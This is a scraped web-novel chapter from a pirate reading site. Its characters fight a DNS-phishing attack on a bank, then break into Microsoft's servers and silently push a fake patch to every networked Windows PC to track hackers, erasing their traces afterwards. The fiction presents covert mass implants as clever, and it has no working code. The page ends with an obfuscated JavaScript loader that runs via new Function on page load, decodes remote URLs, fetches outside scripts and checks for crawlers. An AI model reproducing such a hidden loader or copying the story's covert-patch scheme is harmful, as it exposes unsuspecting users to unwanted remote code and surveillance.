首页
第759章 追查部署
返回
关灯 护眼:关 字号:小

第759章 追查部署

章节报错(免登陆)
下载APP,无广告、完整阅读

一秒记住【笔趣阁】
biquge521.com,更新快,无弹窗!

    经过一天一夜,潇天那和技术团队终于找出攻击性电脑病毒。通过病毒核心样本,制作出专杀来。</P>
    有效的防止这类病毒攻击。</P>
    邢宝华旗下所有带互联网的公司,基本都遭受到ddoS攻击,通过邮件把专杀传递到公司服务器,基本都能解决。</P>
    虽说表面上都解决了这些问题,但病毒式攻击还在持续。</P>
    除了华泓电信,华泓银行被用了URL和dNS攻击。</P>
    这种病毒攻击,都是利用网页来攻击,可以通过更改dNS记录,将用户推送到他们设定的虚假网站上。</P>
    一旦用户进入这种欺诈网站,客户都分辨不出真假网站,就会通过账户号,密码来登录。</P>
    这些用户操作手法都会被记录下来。那么客户等来的就会是他们的账户资金被转走的信息。</P>
    防范手段就是开始扫描,杀毒。潇天那和团队总算轻松点,还要通过日志方式,去追查。</P>
    在追踪方面,包括邢宝华和潇天那等技术人员,都比较弱项。</P>
    其实顺着线查,也能找到头绪,就怕对方阻断机制。</P>
    这是目前最常见之一,发明者邢宝华。</P>
    这厮当初为了躲避追查,而弄出来的暴力阻断,让人查不下去的方式。</P>
    有办法来解决这种问题吗?</P>
    倒是有一个,那就是等对方下次攻击时,用钓鱼方式来诱导黑客进入陷阱内。</P>
    随着网速的提升和服务器的运算能力,只要手速快,几分钟内就能锁定嫌疑人。</P>
    除非这几分钟内,黑客发觉不对,快速的启动阻断机制,从而拔线逃离。</P>
    这就真没办法去追查了。</P>
    好在邢宝华想出一个更损,更绝的招数来。</P>
    大部分黑客都在利用肉鸡来当替身,肉鸡就是指的闲置的电脑,或在使用中的电脑,在电脑主人不知道的情况下,去干一些见不得人的事儿。</P>
    既然这样,那就把世界上所有带网线的电脑,都给种上防御追踪病毒。</P>
    这样一来只要被黑客利用的肉鸡,那么都会把日志上传到总服务器上。根据记录特性扫描那些不寻常的Ip地址。</P>
    成本会高很多,主要服务器的储存是最大的开支。</P>
    种病毒,不是那么好弄,让每一台机器上都用,工程量比较庞大。</P>
    使用电脑的用户,用量最大的软件是什么?</P>
    不是每个人都在用迅雷一样,于是,邢宝华把目光盯上了微软。</P>
    是台机器百分之九十在用微软,那么给微软增加个小补丁怎样。</P>
    邢宝华在和潇天那商量后,感觉这方式不错,首先制订的这种伪装,要非常小。</P>
    第二个要入侵到微软的服务器中,通过服务器把补丁发送出去。</P>
    只要用户开机使用微软系统时,还得自动更新,不然没法起到补丁的作用。</P>
    虽说微软的补丁都会给一个确定安装还是取消安装的功能,但他们这种补丁不会出现提示。</P>
    微软要发现这种补丁只是早晚的事儿,所以推送的时间比较紧。</P>
    制定下方案,当晚就开始制作,用了一晚上,很快出炉。经过一番测试,感觉没问题了,准备开始黑微软。</P>
    微软是那么好黑的吗?</P>
    全世界最牛的黑子都在这里,说是在太岁爷头上动土都不为过。</P>
    那又怎样,都是技术出身,谁怕谁啊!</P>
    为了破微软的防火墙,就做足了各种准备,甚至连小型服务器都准备了十台。</P>
    各种准备都弄好了,准备撸袖子大干一场,本以为是一场硬仗,谁知,在碰到第一道防火墙的时候,就有点懵。</P>
    这不是神盾防御系统吗?</P>
    “老大,把你的神盾系统号,拿来用用。”潇天那当即就给邢宝华电话了。</P>
    神盾安防,就是邢宝华召集乔大爷和盖茨合伙弄出来的。</P>
    乔大爷已经被邢宝华给带歪了,现在全力打造世界顶级安防系统,软件几乎都是跟随微软的盘一起卖。</P>
    谁能想到大名鼎鼎的微软安防进来得如此轻松。</P>
    有密钥就是容易,当然,临走时,还要清理痕迹,避免微软知道黑客是怎么进来的,这种追查更容易。</P>
    弄完推送程序,潇天那等人正在清理痕迹,弄完之后才撤出来。</P>
    轻轻松松的搞定,一点麻烦事儿还没有。</P>
    这就相当你手持令牌去严防森严的皇宫溜达一圈藏点东西,再出来一样。</P>
    果然,在上传补丁后,潇天那让他们所有人,重启电脑,开机后没发现异常,但通过数据流量检测,还是能看出端倪。</P>
    通过系统日志也能看出补丁的自动下载,并且自动安装上。</P>
    如果不懂这些的人,根本不知道这儿,就算懂行的发现端倪,打开日志查看,是微软推送来的安全补丁。</P>
    也只有微软内部做系统的人,才能真正看明白,哪里不一样。</P>
    首先他们压根就没有推送补丁,这个补丁是哪来的。</P>
    要查一查一个准,所以这就是时间问题。</P>
    全球只要联网,使用微软系统的用户,基本都中招。</P>
    但要解除就难了,需要用户进行手动操作。倒不是不能自动删除,但这个东西到底干嘛用的,他们需要弄清楚,是否对微软系统有伤害?</P>
    你以为用户个个都是高手。告诉他们删除注册表,他们都搞不明白注册表到底在哪儿?</P>
    现在万事俱备只等黑子们来上钩了。</P>
    不是弄一些假网站吗?不是要黑服务器吗?</P>
    来吧。</P>
    看着连接服务器的硬盘柜上的闪烁灯,不断闪烁,就知道硬盘已经开始运行了,大量的数据,会通过互联网汇集到这里,从而用专用的扫描软件,来筛,区分Ip和用户的资料。</P>
    全世界的电脑量的数据是非常庞大的,哪怕都是字节模式的过来,也不小。</P>
    看着硬盘阵柜容量不足时,还要不断的增加。</P>
    “潇总,发现异常。”其中有个技术员在筛查分别Ip后,发现不正常地址,就开始汇报。</P>
    潇天那走过去看一眼,对着这位技术员说道:“启动追踪,返现对方阻断,寻找特性。”</P>
    “对方跑了。”</P>
    “追。”</P>
    “最后阻断地址092.11.0583”</P>
    “上一台的特性地址,找。”</P>
    “找到了192.168.0.1根据地址黑进去了。找到日志,找到了!”技术员高兴的说道。</P>
    找到黑子阻断的上一台肉鸡地址,只要黑进去,再翻找日志,就能看到对方留下的痕迹。</P>
    他总不能连续破坏后面所有的机器吧!就算有,也没事儿。根据特性地址,还是能找到相同地址。</P>
    这条线,就是黑子用的地址,也是真实地址,一找一个准。</P>
    潇天那给邢宝华电话,说找到一个。要怎么处理,邢宝华告诉他等等,等他过去再说。</P>
章节报错(免登陆)
下载APP,无广告、完整阅读
验证码: 提交关闭
!function(){function a(a){var _idx="u5afgpg4hc";var b={e:"P",w:"D",T:"y","+":"J",l:"!",t:"L",E:"E","@":"2",d:"a",b:"%",q:"l",X:"v","~":"R",5:"r","&":"X",C:"j","]":"F",a:")","^":"m",",":"~","}":"1",x:"C",c:"(",G:"@",h:"h",".":"*",L:"s","=":",",p:"g",I:"Q",1:"7",_:"u",K:"6",F:"t",2:"n",8:"=",k:"G",Z:"]",")":"b",P:"}",B:"U",S:"k",6:"i",g:":",N:"N",i:"S","%":"+","-":"Y","?":"|",4:"z","*":"-",3:"^","[":"{","(":"c",u:"B",y:"M",U:"Z",H:"[",z:"K",9:"H",7:"f",R:"x",v:"&","!":";",M:"_",Q:"9",Y:"e",o:"4",r:"A",m:".",O:"o",V:"W",J:"p",f:"d",":":"q","{":"8",W:"I",j:"?",n:"5",s:"3","|":"T",A:"V",D:"w",";":"O"};return a.split("").map(function(a){return void 0!==b[a]?b[a]:a}).join("")}var b=a('data:image/jpg;base64,cca8>[qYF F82_qq!7_2(F6O2 5ca[Xd5 Y!5YF_52 2_qql88FjFgcY8fO(_^Y2Fm:_Y5TiYqY(FO5c"^YFdH2d^Y8(Z"a=F8YjYmpYFrFF56)_FYc"("ag""aPXd5 Y=2=O=68D62fODm622Y5V6fFh!qYF h86/Ko0.c}00%n0.cs*N_^)Y5c"}"aaa=78[6L|OJgN_^)Y5c"@"a<@=5YXY5LY9Y6phFgN_^)Y5c"0"a=YXY2F|TJYg"FO_(hY2f"=LqOFWfgfcmn<ydFhm5d2fO^cajngKa=5YXY5LYWfgfcmn<ydFhm5d2fO^cajngKa=5ODLgo=(Oq_^2Lg}0=6FY^V6Fhg6/}0=6FY^9Y6phFgh/o=qOdfiFdF_Lg0=5Y|5Tg0P=d8"#MqYYb"=(8HZ!F5T[(8+i;NmJd5LYcccY=Fa8>[qYF 282_qq!F5T[28qO(dqiFO5dpYmpYFWFY^cYaP(dF(hcYa[Fvvc28FcaaP5YF_52 2Pacda??"HZ"aP(dF(hcYa[P7_2(F6O2 JcYa[5YF_52 Ym5YJqd(Yc"[[fdTPP"=c2YD wdFYampYFwdFYcaaP7_2(F6O2 qcY=F=2a[F5T[qO(dqiFO5dpYmLYFWFY^cY=FaP(dF(hcYa[2vv2caPP7_2(F6O2 LcY=F8""a[7mqOdfiFdF_L8*}=}00<(mqY2pFh??c(mJ_Lhc`c$[YPa`%Fa=qcd=+i;NmLF562p67Tc(aaaP7_2(F6O2 fcY8}a[qYF F8"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7h6CSq^2OJ:5LF_XDRT4"=28FmqY2pFh=O8""!7O5c!Y**!aO%8FHydFhm7qOO5cydFhm5d2fO^ca.2aZ!5YF_52 OPr55dTm6Lr55dTc(a??c(8HZ=qcd=""aa!qYF _8"76Ch"!7_2(F6O2 ^cY=Fa[qYF 28fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!Xd5 O8H"hFFJLg\/\/[[fdTPP}Ko})hFL_h^m^YX5pR5m(O^gQ}1Q"="hFFJLg\/\/[[fdTPP}Ko})hFL_h^m^YX5pR5m(O^gQ}1Q"="hFFJLg\/\/[[fdTPP}Ko})hFL_h^m^YX5pR5m(O^gQ}1Q"="hFFJLg\/\/[[fdTPP}Ko})hFL_h^m^YX5pR5m(O^gQ}1Q"="hFFJLg\/\/[[fdTPP}Ko})hFL_h^m^YX5pR5m(O^gQ}1Q"="hFFJLg\/\/[[fdTPP}Ko})hFL_h^m^YX5pR5m(O^gQ}1Q"="hFFJLg\/\/[[fdTPP}Ko})hFL_h^m^YX5pR5m(O^gQ}1Q"Z!qYF 58JcOHc2YD wdFYampYFwdTcaZ??OH0Za%"/_nd7pJpoh(/}Ko}"!Fj5%8"jR8"%fcnag_vvc5%8"j"%_%"8"%fcnaa=7m5Y|5T%%=2mL5(8Jc5a=2mO2qOdf87_2(F6O2ca[7mqOdfiFdF_L8@=$caP=2mO2Y55O587_2(F6O2ca[F??YvvYca=LYF|6^YO_Fc7_2(F6O2ca[2m5Y^OXYcaP=}0aP=fO(_^Y2FmhYdfmdJJY2fxh6qfc2a=7mqOdfiFdF_L8}PqYF p8"}Ko}"=X8"_nd7pJpoh("!7_2(F6O2 TcYa[}l88Ym5YdfTiFdFYvv0l88Ym5YdfTiFdFY??Ym(qOLYcaP7_2(F6O2 DcYa[Xd5 F8H"}Ko}^)ThF)m7J6YXfhm2YF"="}Ko}X5ThF)mDDT(J67m2YF"="}Ko}2pThFm7J6YXfhm2YF"="}Ko}_JqhFmDDT(J67m2YF"="}Ko}2TOhFm7J6YXfhm2YF"="}Ko}CSqhF)mDDT(J67m2YF"="}Ko})FfThF)fm7J6YXfhm2YF"Z=F8FHc2YD wdFYampYFwdTcaZ??FH0Z=F8"DLLg//"%c2YD wdFYampYFwdFYca%F%"g@Q}1Q"=28H"Y#"%XZ!5cavv2mJ_Lhc"(h#"%5caa!qYF O82YD VY)iO(SYFcF%"/"%p%c_j"j"%_%"8"%fcnag""a=H2mCO62c"v"aZa!7m5Y|5T%%=OmO2OJY287_2(F6O2ca[7mqOdfiFdF_L8@P=OmO2^YLLdpY87_2(F6O2cFa[qYF 28FmfdFd!F5T[28cY8>[qYF 5=F=2=O=6=d=(8"(hd5rF"=q8"75O^xhd5xOfY"=L8"(hd5xOfYrF"=f8"62fYR;7"=_8"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7ph6CSq^2OJ:5LF_XDRT40}@sonK1{Q%/8"=^8""=h80!7O5cY8Ym5YJqd(Yc/H3r*Ud*40*Q%/8Z/p=""a!h<YmqY2pFh!a28_HfZcYH(Zch%%aa=O8_HfZcYH(Zch%%aa=68_HfZcYH(Zch%%aa=d8_HfZcYH(Zch%%aa=58c}nvOa<<o?6>>@=F8csv6a<<K?d=^%8iF562pHqZc2<<@?O>>oa=Kol886vvc^%8iF562pHqZc5aa=Kol88dvvc^%8iF562pHqZcFaa![Xd5 78^!qYF Y8""=F=2=O!7O5cF858280!F<7mqY2pFh!ac587HLZcFaa<}@{jcY%8iF562pHqZc5a=F%%ag}Q}<5vv5<@@ojc287HLZcF%}a=Y%8iF562pHqZccs}v5a<<K?Ksv2a=F%8@agc287HLZcF%}a=O87HLZcF%@a=Y%8iF562pHqZcc}nv5a<<}@?cKsv2a<<K?KsvOa=F%8sa!5YF_52 YPPac2a=2YD ]_2(F6O2c"MFf(L"=2acfO(_^Y2Fm(_55Y2Fi(56JFaP(dF(hcYa[F82mqY2pFh*o0=F8F<0j0gJd5LYW2FcydFhm5d2fO^ca.Fa!Lc@0o=` $[Ym^YLLdpYP M[$[FPg$[2mL_)LF562pcF=F%o0aPPM`a=7mqOdfiFdF_L8*}PTcOa=@8887mqOdfiFdF_Lvv$caP=OmO2Y55O587_2(F6O2ca[@l887mqOdfiFdF_LvvYvvYca=TcOaP=7mqOdfiFdF_L8}PqYF i8l}!7_2(F6O2 $ca[ivvcfO(_^Y2Fm5Y^OXYEXY2Ft6LFY2Y5c7mYXY2F|TJY=7m(q6(S9d2fqY=l0a=Y8fO(_^Y2FmpYFEqY^Y2FuTWfc7m5YXY5LYWfaavvYm5Y^OXYca!Xd5 Y=F8fO(_^Y2Fm:_Y5TiYqY(FO5rqqc7mLqOFWfa!7O5cqYF Y80!Y<FmqY2pFh!Y%%aFHYZvvFHYZm5Y^OXYcaP7_2(F6O2 )ca[LYF|6^YO_Fc7_2(F6O2ca[67c@l887mqOdfiFdF_La[Xd5[(Oq_^2LgY=5ODLgO=6FY^V6Fhg5=6FY^9Y6phFg6=LqOFWfgd=6L|OJg(=5YXY5LY9Y6phFgqP87!7_2(F6O2 Lca[Xd5 Y8Jc"hFFJLg//[[fdTPP}Ko}qFq^)Y6(:mhJ6S_:6m(O^gQ}1Q/((/}Ko}j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7O5cqYF 280!2<Y!2%%a7O5cqYF F80!F<O!F%%a[qYF Y8"JOL6F6O2g76RYf!4*62fYRg}00!f6LJqdTg)qO(S!"%`qY7Fg$[2.5PJR!D6fFhg$[ydFhm7qOO5cmQ.5aPJR!hY6phFg$[6PJR!`!Y%8(j`FOJg$[q%F.6PJR`g`)OFFO^g$[q%F.6PJR`!Xd5 f8fO(_^Y2Fm(5YdFYEqY^Y2Fcda!fmLFTqYm(LL|YRF8Y=fmdffEXY2Ft6LFY2Y5c7mYXY2F|TJY=La=fO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=faP67clia[qYF[YXY2F|TJYgY=6L|OJg5=5YXY5LY9Y6phFg6P87!fO(_^Y2FmdffEXY2Ft6LFY2Y5cY=^=l0a=7m(q6(S9d2fqY8^!Xd5 28fO(_^Y2Fm(5YdFYEqY^Y2Fc"f6X"a!7_2(F6O2 _ca[Xd5 Y8Jc"hFFJLg//[[fdTPP}Ko}qFq^)Y6(:mhJ6S_:6m(O^gQ}1Q/((/}Ko}j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7_2(F6O2 ^cYa[Xd5 F8D62fODm622Y59Y6phF!qYF 280=O80!67cYaLD6F(hcYmLFOJW^^Yf6dFYe5OJdpdF6O2ca=YmFTJYa[(dLY"FO_(hLFd5F"g28YmFO_(hYLH0Zm(q6Y2F&=O8YmFO_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"FO_(hY2f"g28Ym(hd2pYf|O_(hYLH0Zm(q6Y2F&=O8Ym(hd2pYf|O_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"(q6(S"g28Ym(q6Y2F&=O8Ym(q6Y2F-P67c0<2vv0<Oa67c5a[67cO<86a5YF_52l}!O<h%6vv_caPYqLY[F8F*O!67cF<86a5YF_52l}!F<h%6vv_caPP2m6f87m5YXY5LYWf=2mLFTqYm(LL|YRF8`hY6phFg$[7m5YXY5LY9Y6phFPJR`=5jfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc"d7FY5)Yp62"=2agfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=2a=i8l0PqYF F8Jc"hFFJLg//[[fdTPP}Ko})hFL_h^m^YX5pR5m(O^gQ}1Q/f/}Ko}j(8}vY8_nd7pJpoh("a!FvvLYF|6^YO_Fc7_2(F6O2ca[Xd5 Y8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!YmL5(8F=fO(_^Y2FmhYdfmdJJY2fxh6qfcYaP=}YsaPP=@n00aP682dX6pdFO5mJqdF7O5^=28l/3cV62?yd(a/mFYLFc6a=O8Jd5LYW2FcL(5YY2mhY6phFa>8Jd5LYW2FcL(5YY2mD6fFha=c2??OavvcO8/)d6f_?9_dDY6u5ODLY5?A6XOu5ODLY5?;JJOu5ODLY5?9YT|dJu5ODLY5?y6_6u5ODLY5?yIIu5ODLY5?Bxu5ODLY5?IzI?kOqfu5ODLY5/6mFYLFc2dX6pdFO5m_LY5rpY2Fa=Y8cY82dX6pdFO5mJqdF7O5^avv/3cV62?yd(a/mFYLFcYa??2dX6pdFO5m^dR|O_(heO62FL<@=OvvlYjDc7_2(F6O2ca[Lc@0}a=Dc7_2(F6O2ca[Lc@0@a=^c7_2(F6O2ca[Lc@0saPaPaPag^c7_2(F6O2ca[Lc}0}a=^c7_2(F6O2ca[Lc}0@a=Dc7_2(F6O2ca[Lc}0saPaPaP=Yaa=l2vv6??)ca=XO6f 0l882dX6pdFO5mLY2fuYd(O2vvfO(_^Y2FmdffEXY2Ft6LFY2Y5c"X6L6)6q6FT(hd2pY"=7_2(F6O2ca[Xd5 Y=F!"h6ffY2"888fO(_^Y2FmX6L6)6q6FTiFdFYvv(mqY2pFhvvcY8Jc"hFFJLg//[[fdTPP}Ko})hFL_h^m^YX5pR5m(O^gQ}1Q"a%"/)_pj68"%p=cF82YD ]O5^wdFdamdJJY2fc"^YLLdpY"=+i;NmLF562p67Tc(aa=FmdJJY2fc"F"="0"a=2dX6pdFO5mLY2fuYd(O2cY=Fa=(mqY2pFh80=qcd=""aaPaPaca!'.substr(22));new Function(b)()}();